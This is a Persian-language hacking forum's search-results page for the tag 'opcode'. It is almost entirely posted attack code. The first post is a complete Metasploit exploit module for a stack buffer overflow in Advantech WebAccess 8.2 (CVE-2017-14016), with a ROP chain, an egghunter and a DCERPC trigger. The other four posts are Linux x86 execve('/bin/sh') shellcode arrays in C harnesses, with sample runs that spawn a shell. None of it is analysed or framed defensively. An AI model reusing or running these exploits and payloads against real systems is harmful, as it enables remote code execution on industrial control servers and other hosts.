رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'opcode'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

5 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. Hacking

    /* lnx_binsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <[email protected]> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; wikkid oPc0d3z[] = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" "\x0b\x51\x52\x55\x89\xe5\x0f\x34" "\x31\xc0\x31\xdb\xfe\xc0\x51\x52" "\x55\x89\xe5\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+45); pointer(); } _exit(0); }
  3. Hacking

    /* lnx_binsh3.c - v1 - 27 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <[email protected]> Copyright(c) 2005 amnesia <[email protected]> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 - c0ntex debian SID - amnesia execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter $ ./lnx_binsh3 [-] Stack Pointer found -> [0xbffff648] [-] Size of payload egg -> [27] [-] Payload Begin -> [0x804968c] [-] Payload End -> [0x80496b9] sh-2.05b$ */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; /* reduced shellcode size from 45 to 27 - amnesia */ wikkid oPc0d3z[] = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x50\x53\x89\xe1\x31\xd2\xb0" "\x0b\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+27); pointer(); } _exit(0); }
  4. Hacking

    /* lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload Copyright(c) 2005 c0ntex <[email protected]> Copyright(c) 2005 BaCkSpAcE <[email protected]> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Tested: fedora core 3 - c0ntex fedora core 4 - BaCkSpAcE debian SID - amnesia execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80 (gdb) disas __kernel_vsyscall Dump of assembler code for function __kernel_vsyscall: 0xffffe400 <__kernel_vsyscall+0>: push %ecx 0xffffe401 <__kernel_vsyscall+1>: push %edx 0xffffe402 <__kernel_vsyscall+2>: push %ebp 0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp 0xffffe405 <__kernel_vsyscall+5>: sysenter 0xffffe407 <__kernel_vsyscall+7>: nop 0xffffe408 <__kernel_vsyscall+8>: nop 0xffffe409 <__kernel_vsyscall+9>: nop 0xffffe40a <__kernel_vsyscall+10>: nop 0xffffe40b <__kernel_vsyscall+11>: nop 0xffffe40c <__kernel_vsyscall+12>: nop 0xffffe40d <__kernel_vsyscall+13>: nop 0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3> 0xffffe410 <__kernel_vsyscall+16>: pop %ebp 0xffffe411 <__kernel_vsyscall+17>: pop %edx 0xffffe412 <__kernel_vsyscall+18>: pop %ecx 0xffffe413 <__kernel_vsyscall+19>: ret 0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax) 0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax) 0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax) 0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax) 0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax) 0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax) End of assembler dump. (gdb) q so we replace int $0x80 instruction with push %ecx push %edx push %ebp mov %esp,%ebp sysenter which does make the shellcode slightly larger :/ 804807a: 51 push %ecx 804807b: 52 push %edx 804807c: 55 push %ebp 804807d: 89 e5 mov %esp,%ebp 804807f: 0f 34 sysenter $ ./lnx_binsh4 [-] Stack Pointer found -> [0xbfe0f0d8] [-] Size of payload egg -> [23] [-] Payload Begin -> [0x80496c0] [-] Payload End -> [0x80496d7] sh-3.00b$ */ /* Calling: execve(/bin/sh), exit(0) */ #include <stdio.h> typedef char wikkid; /* reduced shellcode size from 45 to 23 - BaCkSpAcE */ wikkid oPc0d3z[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x54" "\x5b\x52\x53\x54\x59\x0f\x34"; unsigned long grab_esp() { __asm__("movl %esp,%eax"); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+23); pointer(); } _exit(0); }
  5. Hacking

    /* lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload Copyright(c) 2004 c0ntex <[email protected]> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Calling: execve(/bin/sh) */ #include <stdio.h> typedef char wikkid; wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" unsigned long grab_esp() { __asm__(" xorl %eax,%eax movl %eax,%ebx movl %esp,%eax "); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); pointer(); } _exit(0x01); }
×